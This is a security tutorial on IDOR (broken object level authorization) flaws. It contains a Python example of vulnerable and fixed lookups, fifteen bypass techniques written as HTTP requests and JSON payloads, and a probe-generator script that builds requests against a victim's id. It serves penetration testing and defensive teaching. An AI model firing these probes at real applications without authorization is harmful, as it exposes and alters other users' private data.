# IDOR

## Introduction

IDOR stands for Insecure Direct Object Reference. It is an access-control flaw in which the application takes a reference to an internal object (a database key, a username, a filename) straight from the request and uses it without checking that the authenticated user is allowed to reach that object. Because the reference is predictable or can be swapped for another one, a user can read, modify or delete data that belongs to any other user in the system. Authentication is usually in place; what is missing is the per-object authorization check, which is why the same class is also called broken object level authorization (BOLA).
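To make the missing check concrete, here is an added example (not code from the original page) of a profile lookup in its vulnerable form beside two fixed forms. The in-memory `PROFILES` store, the `Request` type and the function names are constructed for the illustration; in a real application the session user comes from the verified cookie or token and the store is a database query.

```python
from dataclasses import dataclass

# Constructed sample data: two users, each with a private profile record.
PROFILES = {
    1234: {"owner": 1234, "email": "alice@example.com", "ssn_last4": "1111"},
    2542: {"owner": 2542, "email": "bob@example.com", "ssn_last4": "2222"},
}


@dataclass
class Request:
    session_user: int   # who the server authenticated (from the cookie or token)
    params: dict        # what the client sent; entirely attacker-controlled


def get_profile_vulnerable(req: Request):
    """Authentication happened, authorization did not: any valid id is served."""
    profile = PROFILES.get(int(req.params["id"]))
    if profile is None:
        return 404, None
    return 200, profile


def get_profile_fixed(req: Request):
    """Resolve the object, then check the caller's relationship to that object.
    The check is per record, not per endpoint: every lookup repeats it."""
    profile = PROFILES.get(int(req.params["id"]))
    if profile is None or profile["owner"] != req.session_user:
        # Same answer for "missing" and "not yours" so ids cannot be enumerated.
        return 404, None
    return 200, profile


def get_profile_scoped(req: Request):
    """Alternative fix: never take the id from the client at all, derive it
    from the session. This is the /getuser-with-no-parameter shape."""
    return 200, PROFILES[req.session_user]


if __name__ == "__main__":
    attacker = Request(session_user=1234, params={"id": "2542"})
    print("vulnerable:", get_profile_vulnerable(attacker))
    print("fixed:     ", get_profile_fixed(attacker))
    print("scoped:    ", get_profile_scoped(attacker))
```

The scoped variant is the safest when an endpoint only ever serves the caller's own record; the ownership-check variant is what you need when users legitimately share objects, and it is the one most often forgotten on secondary routes (exports, old versions, alternate formats), which is exactly what the tests below look for.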

## Exploit

1. **Add Parameters to Endpoints:**

The endpoint returns the caller's own record and takes no identifier, so there may be no ownership check at all. Add one and see whether it is honoured:

```http
GET /api/v1/getuser HTTP/1.1
Host: example.com
...
```

Try this to bypass:

```http
GET /api/v1/getuser?id=1234 HTTP/1.1
Host: example.com
...
```

2. **HTTP Parameter Pollution:**

Send the identifier twice. Frameworks differ on whether the first or the last occurrence wins, so a front-end check may validate one value while the back-end lookup uses the other:

```http
POST /api/get_profile HTTP/1.1
Host: example.com
...
user_id=hacker_id&user_id=victim_id
```

3. **Change file type:**

Appending a format extension can route the request to a different handler, or to a static-file path, that performs no ownership check:

```http
GET /v2/GetData/1234 HTTP/1.1
Host: example.com
...
```

Try this to bypass:

```http
GET /v2/GetData/1234 -> 401
GET /v2/GetData/1234.json -> 200
GET /v2/GetData/1234.xml -> 200
GET /v2/GetData/1234.config -> 200
GET /v2/GetData/1234.txt -> 200
```

4. **GraphQL Exploitation**:

Resolvers need the same per-object check as REST handlers. Substitute another user's identifier in the query argument (or in the variables of a parameterised query):

```graphql
query {
  user(id: "other_user_id") {
    name
    email
  }
}
```

5. **Object Level Authorization Bypass**:

A listing endpoint that is scoped to the caller by default may still accept a filter that names another user:

```http
GET /api/v1/messages -> 200
GET /api/v1/messages?user_id=victim_uuid -> 200
```

6. **JSON Parameter Pollution**:

Most JSON parsers keep the last duplicate key, some keep the first. If the layer that checks the value and the layer that uses it parse differently, the check is bypassed:

```json
{"userid":1234,"userid":2542}
```

7. **Wrap the ID with an Array**:

An authorization check that expects a scalar may be skipped, or fail open, on an unexpected type, while the query layer happily accepts a list or a nested object:

```json
{"userid":123} ->401
{"userid":[123]} ->200
```

8. **Wrap the ID with a JSON Object**:

```json
{"userid":123} ->401
{"userid":{"userid":123}} ->200
```

9. **Test Outdated API Versions**:

Older versions often stay deployed without the checks that were added later:

```
GET /v3/users_data/1234 ->401
GET /v1/users_data/1234 ->200
```

10. **Missing Function Level Access Control (MFLAC)**:

Strictly a function-level rather than object-level flaw, but worth testing in the same session. Case variants work when a proxy or ACL rule matches the path case-sensitively in front of an application that routes case-insensitively:

```
GET /admin/profile ->401
GET /Admin/profile ->200
GET /ADMIN/profile ->200
GET /aDmin/profile ->200
GET /adMin/profile ->200
GET /admIn/profile ->200
GET /admiN/profile ->200
```

11. **Send Wildcard Instead of ID**:

A wildcard passed straight into a query may match every object. Compare the response with the one for a known id:

```
GET /api/users/111 ->
GET /api/users/* ->
GET /api/users/% ->
```

12. **Field Injection**:

Add fields the form or API request did not originally contain. If a request expects a `user_id` parameter only on some routes, or derives it from the session, supply one (or a different one) in the body anyway and check whether the application processes it instead of the session value.

13. **Swapping Numeric and Non-Numeric IDs**:

An application that exposes unguessable identifiers may still accept the sequential database key behind them, which is trivial to enumerate:

```
GET /file?id=90djbkdbkdbd29dd -> GET /file?id=302
```

14. **Path Traversal**:

The authorization check may read your own id from the raw path while the router normalises the `..` segment and acts on the victim's id:

```
POST /users/delete/victim_id -> 403
POST /users/delete/my_id/../victim_id -> 200
```

15. **Change Request Content-Type**:

The same endpoint may be handled by different deserialisers, only one of which applies the check. Resend the request with the identifier in the other format:

```
Content-Type: application/xml -> Content-Type: application/json
```
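The steps above are one procedure, so here is an added example (not the page's code) that generates the whole set of probes for one endpoint from a single baseline, plus a simple classifier for the responses. `Probe`, `generate_probes`, `case_variants` and `flags_idor` are names chosen for this example; the endpoint, ids and headers are constructed. It builds requests only and sends nothing, so it can be fed to whatever HTTP client or Burp workflow you use. Steps 12 and 13 are not generated because they need application-specific knowledge (which field names exist, which numeric key sits behind an opaque id).

```python
import json
import re
from dataclasses import dataclass, field

# Constructed headers used by the probes below.
FORM = {"Content-Type": "application/x-www-form-urlencoded"}
JSON = {"Content-Type": "application/json"}
XML = {"Content-Type": "application/xml"}


@dataclass
class Probe:
    technique: str          # which step of the list above this request exercises
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    body: str = ""


def case_variants(segment: str) -> list:
    """Step 10: flip one letter at a time, then the whole segment, like the /admin list."""
    flips = [segment[:i] + segment[i].upper() + segment[i + 1:] for i in range(len(segment))]
    return [v for v in flips + [segment.upper()] if v != segment]


def generate_probes(endpoint: str, my_id: str, victim_id: str, param: str = "user_id") -> list:
    """Build every probe for one collection endpoint such as "/api/v3/users".
    my_id is an object the tester owns; victim_id belongs to a second test account."""
    endpoint = endpoint.rstrip("/")
    probes = []
    # Steps 1 and 5: an endpoint that takes no identifier may still honour one.
    for name in dict.fromkeys((param, "id", "uid")):
        probes.append(Probe("add-parameter", "GET", f"{endpoint}?{name}={victim_id}"))
    # Step 2: send the parameter twice, in both orders; frameworks pick first or last.
    for body in (f"{param}={my_id}&{param}={victim_id}", f"{param}={victim_id}&{param}={my_id}"):
        probes.append(Probe("hpp-form", "POST", endpoint, FORM, body))
    # Step 3: a format suffix may route to a handler without the check.
    for ext in (".json", ".xml", ".config", ".txt"):
        probes.append(Probe("file-type", "GET", f"{endpoint}/{victim_id}{ext}"))
    # Step 6: duplicate JSON key, built by hand because json.dumps would collapse it.
    probes.append(Probe("json-dup-key", "POST", endpoint, JSON,
                        f'{{"{param}":"{my_id}","{param}":"{victim_id}"}}'))
    # Steps 7 and 8: wrap the identifier so a type check sees a list or an object.
    probes.append(Probe("json-array", "POST", endpoint, JSON, json.dumps({param: [victim_id]})))
    probes.append(Probe("json-object", "POST", endpoint, JSON, json.dumps({param: {param: victim_id}})))
    # Step 9: every older version of a /vN/ path.
    m = re.search(r"/v(\d+)/", endpoint)
    if m:
        for v in range(1, int(m.group(1))):
            probes.append(Probe("old-version", "GET",
                                f"{endpoint[:m.start()]}/v{v}/{endpoint[m.end():]}/{victim_id}"))
    # Step 10: case variants of the first path segment.
    first, _, rest = endpoint.lstrip("/").partition("/")
    for variant in case_variants(first):
        probes.append(Probe("case-variant", "GET", f"/{variant}/{rest}/{victim_id}"))
    # Step 11: wildcards that a lookup may pass straight into a query.
    for wild in ("*", "%"):
        probes.append(Probe("wildcard", "GET", f"{endpoint}/{wild}"))
    # Step 14: the check may read my_id from the raw path while the router normalises to victim_id.
    probes.append(Probe("path-traversal", "GET", f"{endpoint}/{my_id}/../{victim_id}"))
    # Step 15: the XML deserialiser may be checked differently from the JSON one.
    probes.append(Probe("content-type", "POST", endpoint, XML, f"<{param}>{victim_id}</{param}>"))
    return probes


def flags_idor(baseline_status: int, baseline_body: str, status: int, body: str, victim_marker: str) -> bool:
    """A probe is interesting when it succeeds, differs from the tester's own
    baseline response, and carries a value only the victim's record would contain."""
    return status == 200 and body != baseline_body and victim_marker in body


if __name__ == "__main__":
    for p in generate_probes("/api/v3/users", "1234", "2542"):
        print(f"{p.technique:15} {p.method} {p.path} {p.body}")
```

`flags_idor` needs a marker that is unique to the victim account (its email, a display name you set up yourself), otherwise a 200 from an endpoint that simply echoes the id back would be a false positive. Run the generated probes once with the attacker session and once unauthenticated; a probe that succeeds in both runs is a missing check, not a bypass specific to the logged-in user.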

## Tools for Parameter Discovery

* Google dorking
* Arjun
* Param Miner (Burp Suite extension)

## Resources

* <https://vickieli.medium.com/how-to-find-more-idors-ae2db67c9489>

